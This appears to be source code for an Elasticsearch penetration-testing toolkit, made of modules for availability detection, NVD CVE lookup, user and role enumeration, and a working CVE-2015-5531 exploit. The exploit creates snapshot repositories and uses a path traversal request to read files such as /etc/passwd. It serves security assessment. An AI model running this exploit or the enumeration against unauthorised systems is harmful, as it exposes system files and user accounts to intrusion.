"""
Elasticsearch user enumeration

This module enumerates what users are available on an Elasticsearch instance

Contains:
- Users class to perform the user enumeration
- run() function as an entry point for running the test
"""

import http
from json import JSONDecoder

from requests import Response
from http import HTTPStatus
from xml.etree.ElementPath import prepare_parent

from ptlibs import ptjsonlib
from ptlibs.ptprinthelper import ptprint

__TESTLABEL__ = "Elasticsearch user enumeration"


class Users:
    """
    This class enumerates what users are available, their roles and privileges
    """
    def __init__(self, args: object, ptjsonlib: object, helpers: object, http_client: object, base_response: object) -> None:
        self.args = args
        self.ptjsonlib = ptjsonlib
        self.helpers = helpers
        self.http_client = http_client
        self.base_response = base_response

        self.helpers.print_header(__TESTLABEL__)


    def _check_privileges(self, role: str, role_privileges: dict, user_properties: dict):
        """
        This method enumerates all privileges assigned to a specific role by going through the JSON output provided by the /_security/roles endpoint.

        Adds the privileges to the JSON output
        """
        indices = role_privileges[role]['indices']
        applications = role_privileges[role]['applications']

        for index in indices:
            privileges = index["privileges"]
            if index["names"][0] == '*':
                index_name = "ALL"
            else:
                index_name = ', '.join(index['names'])

            user_properties["roles"][role].append({index_name: privileges})

            ptprint(f"Privileges on indices: {index_name}: {', '.join(privileges).upper()}; Can edit restricted indices: "
                    f"{index["allow_restricted_indices"]}",
                    "VULN", not self.args.json, indent=12)

        for app in applications:
            privileges = "ALL" if app["privileges"][0] == '*' else app["privileges"]
            privileges_name = "ALL" if app["privileges"][0] == '*' else ', '.join(app["privileges"]).upper()
            app_name = "app_ALL" if app["application"] == "*" else "app_" + app["application"]

            user_properties["roles"][role].append({app_name: privileges})

            ptprint(f"Privileges on application: {app_name}: {privileges_name}",
                    "VULN", not self.args.json, indent=12)

    def _print_user(self, user_properties: dict, check_roles: bool, role_privileges: dict) -> None:
        """
        This method prints the user information to the terminal. If the user has a role of 'superuser', we print it in red

        If we're able to list roles from the /_security/role endpoint, we enumerate privileges assigned to the roles of a user
        with the _check_privileges method
        """
        ptprint(f"Found user: {user_properties['username']}", "VULN", not self.args.json, indent=4)
        ptprint(f"Email: {user_properties['email']}", "VULN", not self.args.json, indent=8)

        roles = set(user_properties["roles"])

        for role in roles:
            if role == "superuser":
                ptprint(f"\033[0mRole: \033[31m{role}", "VULN", not self.args.json, indent=8, colortext=True)
            else:
                ptprint(f"Role: {role}", "VULN", not self.args.json, indent=8)
            if check_roles:
                self._check_privileges(role, role_privileges, user_properties)
            else:
                ptprint(f"Could not enumerate privileges","OK", not self.args.json, indent=4)



    def run(self) -> None:
        """
        Executes the Elasticsearch user enumeration

        Sends an HTTP GET request to the /_security/user endpoint and iterates through the JSON response.
        User by user adds the username, roles and email to the JSON output

        If the host returns an HTTP response other than 200 OK we exit
        """
        check_roles = False
        response = self.http_client.send_request(self.args.url+"_security/user", method="GET",
                                                 headers=self.args.headers, allow_redirects=False)

        if response.status_code != HTTPStatus.OK:
            ptprint(f"Could not enumerate users.",
                    "OK", not self.args.json, indent=4)
            ptprint(f"Received status code: {response.status_code}", "ADDITIONS", self.args.verbose, indent=4, colortext=True)
            return

        users = response.json()
        response = self.http_client.send_request(self.args.url + "_security/role", method="GET",
                                                 headers=self.args.headers, allow_redirects=False)
        if response.status_code == HTTPStatus.OK:
            check_roles = True

        for entry in users:
            user = users[entry]
            roles = dict([(role_name, privileges) for role_name, privileges in zip(user['roles'], [[]])])
            user_properties = {"username": user["username"], "email": user["email"], "roles": roles}
            json_node = self.ptjsonlib.create_node_object("user", properties=user_properties)
            self.ptjsonlib.add_node(json_node)
            self._print_user(user_properties, check_roles, response.json())


def run(args, ptjsonlib, helpers, http_client, base_response):
    """Entry point for running the IsElastic test"""
    Users(args, ptjsonlib, helpers, http_client, base_response).run()



"""
Elasticsearch CVE-2015-5531 test

This module implements a test to see if the host is vulnerable to CVE-2015-5531

https://nvd.nist.gov/vuln/detail/CVE-2015-5531

Contains:
- Vuln class for performing the test
- run() function as an entry point for running the test
"""

import http
from http import HTTPStatus
from ptlibs import ptjsonlib
from ptlibs.ptprinthelper import ptprint
from packaging.version import Version
from urllib.parse import quote_plus
import re
from pathlib import Path
import json


__TESTLABEL__ = "Elasticsearch CVE-2015-5531 test"


class Vuln:
    """
    This class checks to see if the host is vulnerable to CVE-2015-5531 by first checking if the Elasticsearch version is vulnerable
    and then trying to exploit the vulnerability by reading the file specified by the -F switch on the host
    """
    def __init__(self, args: object, ptjsonlib: object, helpers: object, http_client: object, base_response: object) -> None:
        self.args = args
        self.ptjsonlib = ptjsonlib
        self.helpers = helpers
        self.http_client = http_client
        self.base_response = base_response
        self.helpers.print_header(__TESTLABEL__)
        self.cve_id = Path(__file__).stem.upper()


    def _check_version(self) -> None:
        """
        This method compares the version of Elasticsearch running on the host to check if it is < 1.6.1 and thus vulnerable to CVE-2015-5531
        """
        version = Version(self.base_response.json()["version"]["number"])

        if version < Version("1.6.1"):
            ptprint(f"Elasticsearch {version} should be vulnerable to {self.cve_id}", "INFO", not self.args.json, indent=4)
            return

        ptprint(f"Elasticsearch {version} might not be vulnerable to {self.cve_id}", "INFO", not self.args.json, indent=4)


    def _create_repo(self) -> bool:
        """
        This method is the first part of the exploit. It creates a backup repository at /usr/share/elasticsearch/repo/test

        :return: True if the repo was successfully created. False otherwise
        """
        new_repository = '{"type": "fs", "settings": {"location": "/usr/share/elasticsearch/repo/test"}}'
        url = self.args.url + '_snapshot/test'
        headers = {"Content-Type": "application/json"}

        ptprint(f"Creating new backup repository {new_repository} at {url}", "ADDITIONS",
                self.args.verbose, indent=4, colortext=True)

        response = self.http_client.send_request(method="PUT", url=url, headers=headers, data=new_repository)

        if response.status_code != HTTPStatus.OK:
            ptprint(f"Could not create backup repository: Received response: {response.status_code} {json.dumps(response.json(), indent=4)}", "ADDITIONS",
                    self.args.verbose, indent=4, colortext=True)
            return False

        return True


    def _create_snapshot(self) -> bool:
        """
        This method is the second part of the exploit. It creates a new snapshot called backdata at /usr/share/elasticsearch/repo/test/snapshot-backdata

        :return: True if the snapshot was successfully created. False otherwise
        """
        new_snapshot = '{"type": "fs", "settings": {"location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"}}'
        url = self.args.url + '_snapshot/test2'
        headers = {"Content-Type": "application/json"}

        ptprint(f"Creating new snapshot {new_snapshot} at {url}", "ADDITIONS", self.args.verbose, indent=4, colortext=True)

        response = self.http_client.send_request(method="PUT", url=self.args.url + "_snapshot/test2", headers=headers,
                                                 data=new_snapshot)

        if response.status_code != HTTPStatus.OK:
            ptprint(f"Could not create snapshot: Received response: {response.status_code} {json.dumps(response.json(), indent=4)}",
                    "ADDITIONS",
                    self.args.verbose, indent=4, colortext=True)
            return False

        return True


    def _read_file(self) -> bool:
        """
        This method is the third and final part of the exploit. It abuses the directory traversal vulnerability and tries to read the /etc/passwd file

        :return: True if we get an 400 HTTP response (whether we could isolate and read the file from the response or not). False otherwise
        """
        file = self.args.file

        url = self.args.url + "_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f.."+quote_plus(file)

        response = self.http_client.send_request(method="GET", url=url, headers=self.args.headers,
                                                 follow_redirects=False)

        if response.status_code != HTTPStatus.BAD_REQUEST:
            ptprint(f"Could not read {file}. Received response: {response.status_code} {json.dumps(response.json(), indent=4)}", "ADDITIONS",
                    self.args.verbose, indent=4, colortext=True)
            return False

        ascii_list = re.search(r"\[(\d+(?:,\s*\d+)*)\]", response.json()["error"])

        if not ascii_list:
            ptprint(f"Could not isolate file from response. Full response:\n {json.dumps(response.json(), indent=4)}", "INFO",
                    not self.args.json, indent=4)
            content_node = self.ptjsonlib.create_node_object("file", properties={"name": file, "fileContent": response.text})

        else:
            ascii_list = ascii_list.group(0)[1:-1].split(', ')
            file_content = ''.join([chr(int(letter)) for letter in ascii_list])
            ptprint(f"Contents of {file}: {file_content}", "INFO",
                    not self.args.json, indent=4)
            content_node = self.ptjsonlib.create_node_object("file", properties={"name": file, "fileContent": file_content})

        self.ptjsonlib.add_node(content_node)
        return True


    def _exploit(self) -> bool:
        """
        This method exploits CVE-2015-5531 and consists of 3 parts:

        1. Creates a new backup repository with the _create_repo() method
        2. Creates a new snapshot with the _create_snapshot() method
        3. Tries to read the /etc/passwd file

        The exploit is based on the CVE-2015-5531 PoC by vulhub.
        Available at: https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531

        :return: True if all parts of the exploit were successful. False otherwise
        """
        return self._create_repo() and self._create_snapshot() and self._read_file()


    def run(self) -> None:
        """
        Executes the Elasticsearch CVE-2015-5531 test by first checking if the version might be vulnerable and then exploiting
        the vulnerability with the _exploit() method. If the exploit is successful, CVE-2015-5531 is added to the JSON output
        """
        self._check_version()

        if self._exploit():
            ptprint(f"The host is vulnerable to {self.cve_id}", "VULN", not self.args.json, indent=4)
            es_node_key = self.helpers.check_node("swES")
            if es_node_key:
                self.ptjsonlib.add_vulnerability(f"PTV-{self.cve_id}", node_key=es_node_key)
            else:
                self.ptjsonlib.add_vulnerability(f"PTV-{self.cve_id}")

        else:
            ptprint(f"The host is not vulnerable to {self.cve_id}", "OK", not self.args.json, indent=4)


def run(args, ptjsonlib, helpers, http_client, base_response):
    """Entry point for running the Vuln test"""
    Vuln(args, ptjsonlib, helpers, http_client, base_response).run()



"""
Elasticsearch CVE lookup tool

This module send a request to the NVD CVE database and lists all the CVEs the Elasticsearch version running on the host
might be vulnerable to

Contains:
- Vuln class for performing the test
- run() function as an entry point for running the test
"""

import http
from http import HTTPStatus
import requests
from ptlibs import ptjsonlib
from ptlibs.ptprinthelper import ptprint


__TESTLABEL__ = "Elasticsearch CVE lookup"


class Vuln:
    """
    This class prints all CVEs that the host might be vulnerable to and adds them to the JSON output
    """
    def __init__(self, args: object, ptjsonlib: object, helpers: object, http_client: object, base_response: object) -> None:
        self.args = args
        self.ptjsonlib = ptjsonlib
        self.helpers = helpers
        self.http_client = http_client
        self.base_response = base_response
        self.helpers.print_header(__TESTLABEL__)


    def _print_cve(self, cve_list: list):
        """
        This method goes through the provided list of CVEs and prints them out to the terminal and also adds them to the JSON
        output
        """
        for cve in cve_list:
            cve_id = cve["cve"]["id"]
            ptprint(f"The host may be vulnerable to {cve_id} \thttps://nvd.nist.gov/vuln/detail/{cve_id}",
                    "VULN", not self.args.json, indent=8)

            es_node_key = self.helpers.check_node("swES")
            if es_node_key:
                self.ptjsonlib.add_vulnerability(f"PTV-{cve_id}", node_key=es_node_key)
            else:
                self.ptjsonlib.add_vulnerability(f"PTV-{cve_id}")


    def run(self) -> None:
        """
        Executes the Elasticsearch CVE lookup

        The test first sends a request to the NVD CVE API (https://nvd.nist.gov/developers/vulnerabilities) to look for vulnerabilities in the host's Elasticsearch version.
        It then goes through the response and prints the vulnerabilities with the _print_cve() method

        If we get a different HTTP response other than 200 OK, the test exits
        """
        es_version = self.base_response.json()["version"]["number"]
        nvd_url = f"https://services.nvd.nist.gov/rest/json/cves/2.0?cpeName=cpe:2.3:a:elastic:elasticsearch:{es_version}&isVulnerable"

        try:
            response = self.http_client.send_request(method="GET", url=nvd_url)
        except requests.exceptions.RequestException as e:
            self.ptjsonlib.end_error(f"Error retrieving response from NVD database:", details=e,
                                     condition=self.args.json)

        if response.status_code != HTTPStatus.OK:
            ptprint(f"Error retrieving response from NVD database. Received response: {response.status_code} {response.text}",
                    "ADDITIONS", self.args.verbose, indent=4, colortext=True)
            return

        response = response.json()
        cve_list = response.get("vulnerabilities", [])

        if cve_list:
            ptprint(f"Identified {response['totalResults']} possible vulnerabilities in Elasticsearch {es_version}", "VULN",
                    not self.args.json, indent=4)
            self._print_cve(cve_list)
        else:
            ptprint(f"Could not identify any publicly known vulnerabilities in Elasticsearch {es_version}",
                    "OK",
                    not self.args.json, indent=4)

def run(args, ptjsonlib, helpers, http_client, base_response):
    """Entry point for running the Vuln test"""
    Vuln(args, ptjsonlib, helpers, http_client, base_response).run()



"""
Elasticsearch availability test

This module implements a test that checks if the provided host is running Elasticsearch or not

Contains:
- IsElastic to perform the availability test
- run() function as an entry point for running the test
"""

from requests import Response
from http import HTTPStatus
from xml.etree.ElementPath import prepare_parent
from ptlibs import ptjsonlib
from ptlibs.ptprinthelper import ptprint

__TESTLABEL__ = "Elasticsearch availability test"


class IsElastic:
    """
    This class checks to see if a host is running Elasticsearch by looking for JSON content in the hosts response
    """

    def __init__(self, args: object, ptjsonlib: object, helpers: object, http_client: object, base_response: object) -> None:
        self.args = args
        self.ptjsonlib = ptjsonlib
        self.helpers = helpers
        self.http_client = http_client
        self.base_response = base_response

        self.helpers.print_header(__TESTLABEL__)


    def _contains_es_text(self, response: Response) -> bool:
        """
        :return: True if the response body contains the word 'elasticsearch'.
        """
        return "elasticsearch" in response.text.lower()


    def run(self) -> None:
        """
        Executes the Elasticsearch availability test

        Sends an HTTP GET request to the provided URL and checks to see if we get JSON content as a response.

        JSON content not in response - calls ptjsonlib.end_error() to stop execution of all further modules.

        JSON content in response - Check if content contains a security exception in the case of a 401 Unauthorized response or
        "X-elastic-product: Elasticsearch" header in the case of a 200 OK response
        """

        response = self.base_response

        ptprint(f"Full response: {response.text}", "ADDITIONS", self.args.verbose, colortext=True)

        if "application/json" not in response.headers.get("content-type", ""):
            self.ptjsonlib.end_error("The host is not running Elasticsearch", self.args.json)

        if response.status_code == HTTPStatus.UNAUTHORIZED:
            response_json = response.json()

            try:
                if self._contains_es_text(response):
                    ptprint(f"The host is running ElasticSearch", "INFO", not self.args.json, colortext=False, indent=4)
                elif response_json["error"]["root_cause"][0]["type"] == "security_exception":
                    ptprint(f"The host might be running ElasticSearch", "INFO", not self.args.json, colortext=False, indent=4)
            except KeyError:
                ptprint(f"The host is probably not running ElasticSearch", "INFO", not self.args.json, colortext=False, indent=4)

        elif response.status_code == HTTPStatus.OK:
            try:
                if response.headers["X-elastic-product"] == "Elasticsearch":
                    ptprint(f"The host is running ElasticSearch", "INFO", not self.args.json, colortext=False, indent=4)
            except KeyError:
                if self._contains_es_text(response):
                    ptprint(f"The host is running ElasticSearch", "INFO", not self.args.json, colortext=False, indent=4)
                elif "application/json" in response.headers["Content-Type"]:
                    ptprint(f"The host might be running ElasticSearch", "INFO", not self.args.json, colortext=False, indent=4)
        else:
            self.ptjsonlib.end_error("The host is not running Elasticsearch", self.args.json)


def run(args, ptjsonlib, helpers, http_client, base_response):
    """Entry point for running the IsElastic test"""
    IsElastic(args, ptjsonlib, helpers, http_client, base_response).run()
